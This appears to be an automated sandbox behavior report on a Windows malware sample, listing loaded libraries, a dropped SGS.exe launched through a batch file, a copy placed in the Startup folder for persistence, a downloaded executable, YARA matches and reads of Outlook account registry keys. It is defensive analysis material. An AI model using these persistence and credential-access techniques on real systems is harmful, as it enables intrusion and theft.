                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5249171.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: shfolder.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: dlnashext.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: wpdshext.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: msvcp60.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: napinsp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: pnrpnsp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: wshbth.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: nlaapi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: winrnr.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: samcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: msi.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: pstorec.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: ieframe.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wkscli.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: secur32.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: mlang.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: samlib.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: slc.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: msvcp60.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: pstorec.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior

                    Data Obfuscation

                    Source: Yara match | File source: file.exe, type: SAMPLE
                    Source: Yara match | File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000000.2049993958.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000003.2285813255.00000000046A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\SGS.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe, type: DROPPED
                    Source: Yara match | File source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA, | 5_2_00410065
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019BF0C pushad ; retn 0019h | 0_2_0019BF0D
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019EE5B pushad ; ret | 0_2_0019EE8C
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_042FFF86 push B3F78F00h; retf 0000h | 0_2_042FFF8F
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 2_2_0019ED03 pushad ; ret | 2_2_0019ED34
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 2_2_0019CF30 push esp; iretd | 2_2_0019CF31
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 2_2_0019C9A0 push E86FEAB0h; retf | 2_2_0019C9A5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 2_2_0019C258 pushad ; ret | 2_2_0019C259
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 2_2_0019C95C push E86FEAB0h; retf | 2_2_0019C961
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 9_2_0019CA1E push eax; retf 0019h | 9_2_0019CA35
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 9_2_0019CA00 push eax; retf 0019h | 9_2_0019CA01
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 9_2_0019CA3C push eax; retf 0019h | 9_2_0019CA3D
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 9_2_0019C325 push esp; ret | 9_2_0019C32D
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 9_2_0019EE5B pushad ; ret | 9_2_0019EE8C
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 9_2_0019C9F0 push eax; retf 0019h | 9_2_0019C9F1
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 10_2_0019ED03 pushad ; ret | 10_2_0019ED34
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 10_2_0019C9A0 push E86FEAB0h; retf | 10_2_0019C9A5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 10_2_0019C95C push E86FEAB0h; retf | 10_2_0019C961
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 10_2_0019CF6C push esp; iretd | 10_2_0019CF75
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_00412850 push eax; ret | 11_2_0041286E
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_00412880 push eax; ret | 11_2_004128AE
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_0040D342 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, | 11_2_0040D342
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\SGS.exe
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe\:Zone.Identifier:$DATA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_004109EF OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, | 11_2_004109EF

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | File dump: 5234062.bat.5.dr 3880EEB1C736D853EB13B44898B718AB
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | File dump: 5249171.bat.12.dr 3880EEB1C736D853EB13B44898B718AB
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_00409008 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress, | 11_2_00409008
                    Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Process information set: NOOPENFILEERRORBOX
